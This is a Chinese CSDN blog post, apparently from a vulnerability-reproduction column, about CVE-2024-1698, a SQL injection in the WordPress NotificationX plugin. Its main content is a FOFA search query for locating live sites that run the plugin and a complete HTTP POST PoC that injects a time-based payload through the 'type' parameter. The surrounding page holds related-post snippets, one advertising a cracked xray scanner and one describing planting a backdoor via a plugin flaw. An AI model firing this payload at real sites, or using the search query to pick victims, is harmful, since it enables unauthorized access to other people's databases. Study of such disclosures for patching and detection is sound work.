WordPress Plugin NotificationX插件 SQL注入漏洞复现(CVE-2024-1698)

已于 2024-03-20 16:04:33 修改
阅读量603 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: sql web安全 安全
于 2024-03-20 16:03:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136879526
版权

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。

0x02 漏洞概述

WordPress plugin NotificationX是一个应用插件。2.8.2版本及之前 存在安全漏洞,该漏洞源于对用户提供的参数转义不充分以及对现有 SQL 查询缺乏充分的准备,很容易通过“type”参数受到 SQL 注入攻击。

0x03 复现环境

FOFA:body="/wp-content/plugins/notificationx"

0x04 漏洞复现

PoC

POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

PS:延时注入并非实际返回时间

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
WordPress MasterStudy LMS插件 SQL注入漏洞复现(CVE-2024-1512)
0xSec
05-05 570
WordPress Plugin MasterStudy LMS 3.2.5 版本及之前版本存在安全漏洞,该漏洞源于对用户提供的参数转义不足,导致可以通过 /lms/stm-lms/order/items REST 路由的 user 参数进行基于联合的 SQL 注入。
WordPress插件SQL注入漏洞——漏洞复现
W小哥
11-25 7543
复现过程 环境地址:https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe 访问目标网站 常规工具AWVS扫描是扫不出来漏洞的 第一步识别CMS vulnx -u http://219.153.49.228:47712/ --cms wpscan --url http://219.153.49.228:47712/ 给API的token才能将结果输出 ...
字节跳动内推
HWHXY的博客
03-23 576
字节跳动内推
墨者WordPress插件漏洞分析溯源
wswr的博客
03-18 1088
总结:整个流程就算发现这是wordpress然后用专门的wpscan去扫漏洞,然后发现的了插件漏洞,然后利用整个插件漏洞来植入后门,然后获取key文件 思路:尝试绕过登录,进入页面发现不行,然后面向搜索引擎学习,看别人的做法 这个老哥的做法和流程应该是没问题,只是到了那个要翻墙的环节我应该就不行了 WordPress插件SQL注入漏洞——漏洞复现_W小哥1的博客-CSDN博客_wordpress注入漏洞 于是我又看了这个老哥 墨者学院 - WordPress插件漏洞分析溯源_多崎巡礼的博客-CSD
xray1.9.4高级社区版下载
qq_49869351的博客
01-12 7116
xray因其方便的代理检测模式,高效率,易于使用,和多样的poc闻名于安全圈。就这23年初始,xray就更新了1.9.4版本。已经添加了许可证,进行了pj。供大家下载,并且内置了superxray图像化界面,非常方便。
CVE-2018-20555:社交网络选项卡Wordpress插件漏洞-CVE-2018-20555
02-05
CVE-2018-20555 由Design Chemical公司生产的名为的Wordpress插件泄漏了其用户的Twitter access_token,access_token_secret,consumer_key和consumer_secret两次,这导致其Twitter帐户被接管。 这是由显示Twitter小...
sonar-tsql-plugin:SonarQube的T-SQL语言插件
01-28
该存储库包含Sonar的T-SQL语言插件。 !!! 重要!!! 该插件将不再更新。 请改用因为它支持多种方言并包含各种代码修复。 描述 当前插件支持: Microsoft的14条代码分析规则。 可以在找到更多详细信息。 SQL Code...
fluent-plugin-sql:FluentdSQL输入输出插件
01-28
注意:fluent-plugin-sql v2的缓冲区格式与v1不同。 如果您将插件更新为v2,请不要重复使用v1的缓冲区。 安装 $ fluent-gem install fluent-plugin-sql --no-document $ fluent-gem install pg --no-document # for...
wordpress-ad-plugin:AdPlugg WordPress广告插件
02-28
AdPlugg WordPress广告插件AdPlugg WordPress广告插件是一个简单的插件,可让您在WordPress网站上展示广告。欢迎使用AdPlugg WordPress广告插件Github存储库尽管可以在上找到有关AdPlugg 的文档,但您可以在这里浏览...
sql-maven-pluginSQL Maven插件
02-04
MojoHaus SQL Maven插件这是 。发行确保gpg-agent正在运行。 执行mvn -B release:prepare release:perform 要发布站点,请执行以下操作: cd target/checkoutmvn verify site site:stage scm-publish:publish-scm
generator-plugin-wp:Yeoman WordPress插件生成器
02-05
要使用generator-plugin-wp,请使用cd进入WordPress插件文件夹,然后: yo plugin-wp 系统将提示您创建插件的步骤。 子发电机 生成漂亮的新插件后,将cd插入新插件的目录。 在插件目录中时,您可以运行称为子生成...
starter-plugin:自定义 WordPress 插件样板,强调代码质量
05-31
WordPress 入门插件一个强调代码质量的 WordPress 插件样板。 该样板为您提供了快速启动自定义插件开发项目的坚实基础。 它完全符合 PHPCS 和 WPCS 编码标准。 它采用模块化设计。 重点是 SOLID 原则。 验证器内置于...
mauvera-wp-plugin:适用于Wordpress的MVP Mauvera插件
05-11
mauvera-wp-plugin 适用于Wordpress的MVP Mauvera插件 如何使用 1-上传并激活插件 下载zip文件“ mauvera.zip”,然后通过以下任一方式上传 ftp / cpanel到“ wp-content / plugins /”。 插件>添加新页面中的...
漏洞复现WordPress Plugin NotificationX 存在sql注入CVE-2024-1698
失心少年
03-22 539
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。WordPressWordPress plugin都是WordPress基金会的产品。WordPress Plugin NotificationX 存在安全漏洞,该漏洞源于对用户提供的参数转义不充分以及对现有 SQL 查询缺乏充分的准备,很容易通过“type”参数受到 SQL 注入攻击。
WordPress LayerSlider插件SQL注入漏洞复现(CVE-2024-2879)
最新发布
0xSec
04-10 792
WordPress LayerSlider插件版本7.9.11 – 7.10.0中,由于对用户提供的参数转义不充分以及缺少wpdb::prepare(),可能导致通过 ls_get_popup_markup 操作受到SQL注入攻击,未经身份验证的威胁者可利用该漏洞从数据库中获取敏感信息。
(CVE-2022-21661)WordPress SQL 注入漏洞分析和复现
weixin_50464560的博客
09-07 4699
转载https://www.freebuf.com/articles/web/321297.html。
CVE-2019-10247漏洞处理
03-29
CVE-2019-10247是一个在Jenkins中的安全漏洞,该漏洞存在于Pipeline: Groovy Plugin中,攻击者可以利用该漏洞执行未授权的Groovy脚本。 以下是处理CVE-2019-10247漏洞的步骤: 1. 首先,您需要确认您的Jenkins版本是否受到该漏洞的影响。该漏洞影响Jenkins Pipeline: Groovy Plugin的所有版本。您可以通过访问Jenkins漏洞数据库来查看所有受影响的版本。 2. 如果您的版本受到影响,则需要立即升级到最新版本。Jenkins已发布了一个修复程序,您可以通过访问Jenkins官方网站来下载最新版本。 3. 如果您无法立即升级,您可以使用插件管理器来禁用Pipeline: Groovy Plugin插件。这将防止攻击者利用该漏洞。 4. 另外,您还可以实施其他安全措施,例如限制Jenkins的访问权限、执行最小特权原则、使用双因素身份验证等。 总之,处理CVE-2019-10247漏洞需要立即采取措施,以防止攻击者利用该漏洞对您的系统进行攻击和入侵。升级到最新版本或禁用插件是最有效的措施之一。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值